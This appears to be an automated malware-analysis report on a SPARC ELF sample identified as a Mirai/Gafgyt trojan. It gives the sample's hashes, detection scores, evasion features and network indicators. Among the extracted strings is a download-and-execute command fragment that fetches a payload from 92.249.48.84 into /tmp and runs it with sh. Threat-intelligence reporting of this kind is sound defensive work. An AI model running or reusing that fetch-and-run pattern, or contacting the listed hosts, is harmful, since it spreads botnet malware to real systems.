db0fa4b8db0333367e9bda3ab68b8042.spc

First submission 2024-10-14 20:16:01

File details

File type: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
Mime type: application/x-executable
File size: 83.75 KB (85760 bytes)
MD5: 04e015b3d6ceca8cb0c8ed2ecc3c7703
SHA1: 495fe4039c0298b0fe6998fbbf04d2e7b584ac96
SHA256: 1550b6e83427e6250c6908582d642c70b9b08106a978adc00f4e6b2e09e8f9ee

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 42/77 VT report date: 2024-10-13 15:35:06
Malware Type 1 trojan
Threat Type 3 mirai gafgyt smmr1

URLs, FQDN and IP indicators 1

URL Host (FQDN/IP) Date Added
hXXp://83.233.102.197/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc VirusTotal Report 83.233.102.197 VirusTotal Report 2024-10-14 20:16:02

Strings analysis - Possible IPs found 2

92.249.48.84
127.0.0.1

Strings analysis - Possible URLs found 3

http://schemas.xmlsoap.org/soap/encoding/
http://schemas.xmlsoap.org/soap/envelope/
http://92.249.48.84/bin+-O+/tmp/gaf;sh+/tmp/gaf